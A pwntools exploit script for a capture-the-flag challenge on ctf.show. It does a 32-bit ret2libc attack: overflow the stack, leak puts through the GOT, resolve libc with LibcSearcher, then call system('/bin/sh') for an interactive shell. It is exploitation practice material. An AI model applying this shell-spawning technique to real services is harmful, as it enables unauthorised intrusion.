1
"""
2
- 本地正常：python3 exp.py
3
- 本地 debug：python3 exp.py DEBUG
4
- 远程正常：python3 exp.py REMOTE
5
- 远程 debug 日志：python3 exp.py REMOTE DEBUG
6
"""
7
from pwn import *
8
from LibcSearcher import *
9

10
context(os="linux", terminal=["cmd.exe", "/c", "start"])
11

12
binary_path = "./pwn"
13
host = "pwn.challenge.ctf.show"  # 地址
14
port = 28251  # 端口
15

16
elf = ELF(binary_path, checksec=False)
17
context.binary = elf
18

19
if elf.bits == 64:
20
    context.arch = "amd64"
21
    gdbscript = """
22
    b *main
23
    c
24
    """
25
else:
26
    context.arch = "i386"
27
    gdbscript = """
28
    b *main
29
    c
30
    """
31

32
if args.DEBUG:
33
    context.log_level = "debug"
34
else:
35
    context.log_level = "info"
36

37
if args.REMOTE:
38
    io = remote(host, port)
39
else:
40
    io = process(binary_path)
41
    if args.DEBUG:
42
        gdb.attach(io, gdbscript=gdbscript)
43

44

45
def p():
46
    pause()
47

48

49
offset = 0x88 + 4
50
main_addr = elf.symbols["main"]
51
puts_plt = elf.plt["puts"]
52
puts_got = elf.got["puts"]
53

54
payload = b"A" * offset + p32(puts_plt) + p32(main_addr) + p32(puts_got)
55
io.sendline(payload)
56

57
puts_addr = u32(io.recv()[0:4])
58
print(hex(puts_addr))
59

60
libc = LibcSearcher("puts", puts_addr)
61
libc_base = puts_addr - libc.dump("puts")
62
print(hex(libc_base))
63

64
system_addr = libc.dump("system") + libc_base
65
binsh_addr = libc.dump("str_bin_sh") + libc_base
66

67
payload = b"A" * offset + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
68
io.sendline(payload)
69

70
io.interactive()